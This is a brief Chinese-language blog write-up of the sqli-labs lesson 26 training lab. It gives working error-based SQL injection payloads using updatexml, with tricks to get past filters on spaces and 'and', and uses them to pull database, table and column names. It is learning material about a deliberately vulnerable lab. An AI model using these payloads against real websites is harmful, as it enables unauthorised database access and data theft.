sqli-labs(26)


0X01

測試閉合 單引號報錯 雙引號不報錯 ’閉合

構造語句  過濾了空格和and

?id=1' anandd 1=1%23

?id=1'+anandd+1=1%23

百度一下

一去看源碼 真的頂不住

那我們就別光想着正確的地方輸入了 我們用報錯注入

?id=1'||updatexml(1,concat(':',(select database())),1)||'1'='1

0X02爆表名

but 好像不行

1'||updatexml(1,concat(':',(select table_name from informatiom_schema.tables where table_schema='security' limit 0,1)),1)||'1'='1

繞過

0'||updatexml(1,concat('$',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),0)||'1'='1

0X03爆破列名

?id=-1%27||updatexml(1,concat(%27%%27,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name=%27users%27))),1)||%271%27=%271

 

 

hint:group_concat(table_name)) 第一個括號是閉合select 之后的空格 第二個括號是閉合group_caoncat語法

 

 

加油學習 切記 學習之路 少就是多 慢就是快


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM